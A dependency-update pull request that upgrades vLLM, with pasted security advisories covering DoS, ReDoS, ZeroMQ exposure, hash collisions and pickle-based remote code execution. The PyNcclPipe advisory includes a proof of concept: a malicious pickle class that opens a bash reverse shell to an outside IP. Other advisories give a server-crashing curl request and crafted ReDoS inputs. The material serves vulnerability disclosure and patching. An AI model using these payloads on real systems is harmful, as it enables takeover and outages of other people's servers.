Conversation

renovate[bot]
Contributor

@renovate renovate bot commented May 31, 2025

This PR contains the following updates:

Package  Change
vllm     ==v0.8.4 -> ==0.11.0
vllm     ==v0.6.6 -> ==0.11.0
vllm     ==v0.6.4 -> ==0.11.0
vllm     ==0.8.4 -> ==0.11.0
vllm     ==0.6.6 -> ==0.11.0
vllm     ==0.6.4 -> ==0.11.0

phi4mm: Quadratic Time Complexity in Input Token Processing leads to denial of service

CVE-2025-46560 / GHSA-vc6m-hm49-g9qg

More information

Details

Summary

A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs.

Details

Affected Component: the input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197

The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens each, total time becomes O(k·m·n), approximating O(n²) in worst-case scenarios.
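
For illustration, here is a minimal sketch of that pattern (hypothetical names and a single fixed expansion length, not the verbatim vLLM code):

def expand_placeholders_quadratic(input_ids, placeholder_ids, expansion_len):
    i = 0
    while i < len(input_ids):
        if input_ids[i] in placeholder_ids:
            tokens = [input_ids[i]] * expansion_len
            # O(n) copy on every replacement -> O(n^2) overall
            input_ids = input_ids[:i] + tokens + input_ids[i + 1:]
            i += expansion_len
        else:
            i += 1
    return input_ids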

PoC

Test data demonstrates quadratic time growth:

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

Doubling input size increases runtime by ~4x (consistent with O(n²)).
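
Reusing expand_placeholders_quadratic from the sketch above, a minimal benchmark (not the reporter's original script) reproduces this growth curve:

import time

def bench(n, expansion_len=16):
    ids = [-1 if i % 2 == 0 else i for i in range(n)]  # every other token is a placeholder
    start = time.perf_counter()
    expand_placeholders_quadratic(ids, {-1}, expansion_len)
    return time.perf_counter() - start

for n in [100, 200, 400, 800, 1600, 3200, 6400]:
    print(f"n={n:5d}: {bench(n):7.3f}s")  # runtime roughly quadruples per doubling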

Impact

Denial-of-Service (DoS): An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.

Remediation Recommendations

Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.

##### Pseudocode for an O(n) solution
# placeholder_ids: set of placeholder token ids; expansion_len: mapping from
# placeholder id to its precomputed expansion length (both assumed available).
new_input_ids = []
for token in input_ids:
    if token in placeholder_ids:
        new_input_ids.extend([token] * expansion_len[token])
    else:
        new_input_ids.append(token)

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Vulnerable to Remote Code Execution via Mooncake Integration

CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM's integration with mooncake is vulnerable to remote code execution due to its use of pickle-based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is similar to GHSA-x3m8-f7g5-qhm7; the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here, recv_pyobj() contains an implicit pickle.loads(), which leads to potential RCE.
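
To see why this is dangerous: pyzmq's recv_pyobj() is essentially pickle.loads() applied to whatever bytes arrive on the socket, and pickle will execute a payload's __reduce__ during deserialization. A standalone illustration (not mooncake's actual wiring):

import pickle

class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("id",))  # attacker-chosen command

payload = pickle.dumps(Evil())
pickle.loads(payload)  # runs `id` -- the same call recv_pyobj() makes internally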

Severity

  • CVSS Score: 10.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Allows Remote Code Execution via PyNcclPipe Communication Service

CVE-2025-47277 / GHSA-hjq4-87xh-g4fv

More information

Details

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. GPU-side KV-cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control-message passing is handled via the send_obj and recv_obj methods.

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.
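
A sketch of the surprising behavior (assumes PyTorch is installed; the address is hypothetical):

from datetime import timedelta
from torch.distributed import TCPStore

# Even though a specific private IP is passed as host_name, the master
# TCPStore's listening socket binds to 0.0.0.0, so the port is reachable
# on every interface.
store = TCPStore(
    host_name="10.0.0.5",  # hypothetical private address
    port=18888,
    world_size=2,
    is_master=True,
    timeout=timedelta(seconds=30),
)
# `ss -ltn` on the host would show the socket listening on 0.0.0.0:18888.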

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw: it directly processes client-provided data using pickle.loads, creating an unsafe deserialization vulnerability that can lead to Remote Code Execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config = KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu",
)

p = PyNcclPipe(config=config, local_rank=0)
p.recv_tensor()  # Receive data
  2. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(), dst=0)

The call stack triggering RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
	-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
		-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
			-> pickle.loads 

A shell is obtained, as shown in the reporter's screenshot (image omitted).

Reporters

This issue was reported independently by three different parties:

  • @kikayli (Zhuque Lab, Tencent)
  • @omjeki
  • Russell Bryant (@russellb)

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.6.5 and prior to 0.8.5, having vLLM integration with mooncake, are vulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack. vLLM instances that do not make use of the mooncake integration are not vulnerable. This issue has been patched in version 0.8.5.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


Data exposure via ZeroMQ on multi-node vLLM deployment

CVE-2025-30202 / GHSA-9f8f-2vmf-885j

More information

Details

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By connecting to this socket many times and never reading the data published to it, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.
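
A sketch of that slow-subscriber denial of service (assumes pyzmq; the endpoint is hypothetical, since the port is deployment-specific):

import zmq

ctx = zmq.Context()
subs = []
for _ in range(100):
    s = ctx.socket(zmq.SUB)
    s.setsockopt(zmq.SUBSCRIBE, b"")            # subscribe to all messages
    s.connect("tcp://primary-vllm-host:55555")  # hypothetical host and port
    subs.append(s)
# ...then simply hold the connections open without ever calling recv(),
# so each connection's buffers fill and the publisher slows or blocks.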

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcast to the tensor parallelism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83
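
In rough terms, that split works like this (a simplified sketch, not the exact vLLM helper):

import torch

def split_tensor_dict(tensor_dict):
    # Only the picklable metadata list goes over ZeroMQ; the tensor
    # payloads themselves travel separately via torch.distributed.
    metadata_list, tensor_list = [], []
    for key, value in tensor_dict.items():
        if isinstance(value, torch.Tensor):
            # Replace each tensor with a lightweight description of it.
            metadata_list.append((key, ("tensor", value.dtype, value.shape)))
            tensor_list.append(value)
        else:
            metadata_list.append((key, value))
    return metadata_list, tensor_list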

Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that the port used is random.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration

CVE-2025-30165 / GHSA-9pcc-gvx5-r5wm

More information

Details

Affected Environments

Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern.

Since V0 has been off by default since v0.8.0 and the fix is fairly invasive, we have decided not to fix this issue. Instead, we recommend that users ensure their environment is on a secure network in case this pattern is in use.

The V1 engine is not affected by this issue.

Impact

In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a SUB ZeroMQ socket and connect to an XPUB socket on the primary vLLM host.

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301

When data is received on this SUB socket, it is deserialized with pickle. This is unsafe, as it can be abused to execute code on a remote machine.

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470

Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment.

Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine.

Severity

  • CVSS Score: 8.0 / 10 (High)
  • Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-46570 / GHSA-4qjh-9fv9-r85r / PYSEC-2025-53

More information

Details

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.

Severity

Unknown

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


vLLM DOS: Remotely kill vllm over http with invalid JSON schema

CVE-2025-48942 / GHSA-6qc9-v4r8-22xg / PYSEC-2025-54

More information

Details

Summary

Hitting the /v1/completions API with an invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call

(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

will provoke an uncaught exception from xgrammar in ./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with an invalid json_schema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM has a Regular Expression Denial of Service (ReDoS, Exponential Complexity) Vulnerability in pythonic_tool_parser.py

CVE-2025-48887 / GHSA-w6q7-j642-7c25 / PYSEC-2025-50

More information

Details

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.
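
A minimal reconstruction of such a script (a sketch using the pattern quoted above and the second crafted-input form; not the reporter's original):

import re
import time

PATTERN = re.compile(
    r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*"
    r"([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"
)

for repeat in range(1, 7):
    crafted = "[A(A=" + "\t)A(A=,\t" * repeat  # never closed, forcing backtracking
    start = time.perf_counter()
    PATTERN.match(crafted)  # returns None, but only after catastrophic backtracking
    print(f"Length: {len(crafted)}, Time: {time.perf_counter() - start:.4f} seconds")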

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False

Impact
  • Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
  • Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
  • Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-48942 / GHSA-6qc9-v4r8-22xg / PYSEC-2025-54

More information

Details

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with an invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar to GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, which involves a regex rather than a JSON schema. Version 0.9.0 fixes the issue.

Severity

Unknown

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


CVE-2025-48943 / GHSA-9hcf-v7m4-6m2j / PYSEC-2025-55

More information

Details

vLLM is an inference and serving engine for large language models (LLMs). Versions 0.8.0 up to but excluding 0.9.0 have a Denial of Service (ReDoS) issue that causes the vLLM server to crash if an invalid regex is provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg/CVE-2025-48942, but for a regex instead of a JSON schema. Version 0.9.0 fixes the issue.

Severity

Unknown

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


vLLM vulnerable to Regular Expression Denial of Service

GHSA-j828-28rj-hfhp

More information

Details

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

  • The regex r"\((.*?)\)\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
  • Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

  • Limit the input string length.
  • Use a non-recursive matching approach, or write a regex with stricter content constraints.
  • Consider using possessive quantifiers or atomic groups (supported in Python's re module only since 3.11), or split and process before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

  • The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

  • Limit the length of model_output.
  • Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
  • Prefer re.finditer() and enforce a length constraint on each match.

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

  • The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
  • Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

  • Use a more specific pattern (e.g., via JSON parsing).
  • Impose limits on current_text length.
  • Avoid using .* to capture large blocks of text; prefer structured parsing when possible.

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

  • The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
  • Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

  • Limit the length of actual.
  • Prefer stepwise search for { and } or use a robust JSON extraction tool.
  • Recommend first locating the range with simple string search, then applying regex.
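
For item 4 in particular, the last two suggestions can be combined into a brace-aware extraction that uses the standard json module instead of a regex (a sketch, assuming the goal is recovering the first JSON object from actual):

import json

def extract_first_json_object(text):
    # Locate the first '{' with a simple string search, then let the real
    # JSON parser consume exactly one object -- no backtracking-prone regex.
    start = text.find("{")
    if start == -1:
        return None
    try:
        obj, _end = json.JSONDecoder().raw_decode(text, start)
    except json.JSONDecodeError:
        return None
    return obj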

Severity

  • CVSS Score: 4.3 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM has a Weakness in MultiModalHasher Image Hashing Implementation

CVE-2025-46722 / GHSA-c65p-x677-fgj6 / PYSEC-2025-43

More information

Details

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.
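
The collision is straightforward to demonstrate (a standalone sketch using Pillow; the 30x100/100x30 example above behaves the same way):

from PIL import Image

data = bytes(range(256)) * 12              # 3072 bytes of raw pixel data
a = Image.frombytes("L", (32, 96), data)   # 32x96 8-bit grayscale
b = Image.frombytes("L", (96, 32), data)   # 96x32 8-bit grayscale
assert a.size != b.size
assert a.tobytes() == b.tobytes()          # identical hash input regardless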

Details
  • Affected file: vllm/multimodal/hasher.py
  • Affected method: MultiModalHasher.serialize_item
    https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
  • Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
  • Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
  • Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
    • Incorrect cache hits, leading to abnormal responses
    • Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.
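
A sketch of a serializer along these lines (a hypothetical helper, not vLLM's actual patch):

import hashlib
import json
from PIL import Image

def hash_image(img: Image.Image) -> str:
    # Hash the pixel bytes together with size, mode, format, and info.
    h = hashlib.sha256()
    meta = {
        "size": img.size,
        "mode": img.mode,
        "format": img.format,
        "info": sorted(img.info.items()),
    }
    h.update(json.dumps(meta, default=str).encode())  # metadata first
    h.update(img.tobytes())                           # then the raw pixels
    return h.hexdigest()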

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.

Impact for other modalities

The video modality is affected as well: a video is transformed into a multi-dimensional numpy array whose dimensions encode the video's length, width, time, and so on, so the same problem exists there, because the raw numpy byte sequence likewise fails to capture the array's shape.

